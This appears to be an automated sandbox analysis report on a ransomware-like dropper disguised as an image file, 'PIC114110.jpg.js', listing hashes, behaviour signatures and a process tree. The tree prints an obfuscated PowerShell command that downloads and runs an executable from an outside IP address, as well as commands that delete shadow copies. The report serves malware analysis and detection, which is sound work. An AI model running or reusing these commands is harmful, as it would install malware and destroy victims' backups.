Analysis

  • max time kernel
    131s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    08-07-2020 01:06

General

  • Target

    PIC114110.jpg.js

  • Size

    83KB

  • MD5

    821a6c3122354612133a542992bab324

  • SHA1

    efdbbf3dbeed7f53ccf2b73d7afcc6d16c8ca320

  • SHA256

    370dbeca970b02f6c1a07803c736de0fa30a40851f7a21178eb0bdaa16af61ab

  • SHA512

    6474f350bf4790a681677400019d2540d75468d307535a73f296acb3792fb8b19e14140c6b0ad712cd91d493fdeea59048117d07853f2d6c6f189a906a17dc46

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://217.8.117.63/tstjs.exe

Signatures

  • Suspicious use of AdjustPrivilegeToken 67 IoCs
  • Suspicious behavior: EnumeratesProcesses 545 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Enumerates connected drives 3 TTPs
  • Executes dropped EXE 3 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blacklisted process makes network request 1 IoCs
  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC114110.jpg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c SGIuanAqBiKFHsR & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','%temp%LrD47.exe'); & %temp%LrD47.exe & IzCrmFNBwYXdgpf
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','C:\Users\Admin\AppData\Local\TempLrD47.exe');
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        PID:1548
      • C:\Users\Admin\AppData\Local\TempLrD47.exe
        C:\Users\Admin\AppData\Local\TempLrD47.exe
        3⤵
        • Executes dropped EXE
        • Adds Run entry to start application
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\218571821623978\taskhostw.exe
          C:\Windows\218571821623978\taskhostw.exe
          4⤵
          • Executes dropped EXE
          • Windows security bypass
          • Modifies Windows Defender Real-time Protection settings
          • Windows security modification
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Users\Admin\AppData\Local\Temp\2705719231.exe
            C:\Users\Admin\AppData\Local\Temp\2705719231.exe
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops desktop.ini file(s)
            • UAC bypass
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:3284
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3392
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:952
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1580
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:3600
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2732
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:2120
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1836

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads